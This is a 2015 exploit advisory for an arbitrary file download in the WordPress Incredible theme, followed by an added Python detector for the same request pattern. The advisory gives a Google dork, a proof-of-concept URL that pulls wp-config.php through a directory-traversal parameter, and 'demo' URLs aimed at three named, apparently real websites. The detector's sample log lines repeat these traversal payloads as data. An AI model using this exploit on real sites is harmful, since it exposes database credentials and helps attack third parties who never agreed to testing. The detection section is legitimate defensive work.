
WordPress Incredible - Responsive Arbitrary File Download Vulnerability

Author: JOK3R , Published: 19-02-2015
# Exploit Title: wordpress Incredible - Responsive Arbitrary File Download Vulnerability
# Date: 17/02/2015
# Exploit Author: JOK3R
# Vendor Homepage: http://themeforest.net/item/incredible-responsive-wordpress-theme/3016398
# Contact :
#Y!D : n4tw0rk@yahoo.com
#Skype : Master_jok3r
# Tested on: Kali Linux / Windows 8.1
# Google Dork: index of /wp-content/themes/incrediblewp/
######################
# PoC
http://target/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php

#Demo :
#http://www.pacificgenetech.com/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
#http://sunflowergroup.com/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
#www.spoedtandartsdenhaag.net/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
#
##########################################
# Spc Thanks : Mohamad Nofozi - sheytan azzam - Alireza promis - Mr moein - root3r - sina lizard - kamral hellish - mr mahkoom And All Iranian Hackers And Exploiters
###########################################
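
The following detection sketch is an added example, not part of the original advisory. It scans web server access-log lines for the request pattern shown in the PoC (`action=revslider_show_image` with an `img` value that traverses directories or is not an image). The log format, the list of image extensions, and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Extensions a legitimate revslider_show_image request would ask for (assumption).
IMAGE_EXT = (".jpg", ".jpeg", ".png", ".gif")
# Request line inside a combined-format access log entry (assumed log format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def fully_unquote(value, rounds=3):
    """Undo repeated percent-encoding (e.g. %252e%252e) so '..' cannot hide."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_img(line):
    """Return the decoded img value if the line matches the PoC pattern, else None."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    url = urlsplit(m.group(1))
    if not url.path.endswith("/wp-admin/admin-ajax.php"):
        return None
    params = parse_qs(url.query, keep_blank_values=True)
    if "revslider_show_image" not in params.get("action", []):
        return None
    for raw in params.get("img", []):
        img = fully_unquote(raw).replace("\\", "/")
        # Flag traversal, absolute paths, or anything that is not an image file.
        if ".." in img or img.startswith("/") or not img.lower().endswith(IMAGE_EXT):
            return img
    return None

# Constructed sample log lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = [
    '203.0.113.7 - - [19/Feb/2015:10:01:02 +0000] "GET /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php HTTP/1.1" 200 3120',
    '203.0.113.7 - - [19/Feb/2015:10:01:09 +0000] "GET /wp-admin/admin-ajax.php?action=revslider_show_image&img=%252e%252e%2Fwp-config.php HTTP/1.1" 200 3120',
    '198.51.100.4 - - [19/Feb/2015:10:02:11 +0000] "GET /wp-admin/admin-ajax.php?action=revslider_show_image&img=uploads/2015/02/banner.jpg HTTP/1.1" 200 48211',
    '198.51.100.9 - - [19/Feb/2015:10:03:40 +0000] "GET /wp-admin/admin-ajax.php?action=heartbeat HTTP/1.1" 200 58',
]

if __name__ == "__main__":
    for entry in SAMPLE_LOG:
        hit = suspicious_img(entry)
        if hit is not None:
            print(f"ALERT {entry.split()[0]} requested img={hit}")
```

A 200 response to a flagged request whose body size matches `wp-config.php` indicates the file was served, so the database credentials and salts it contains should be rotated.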
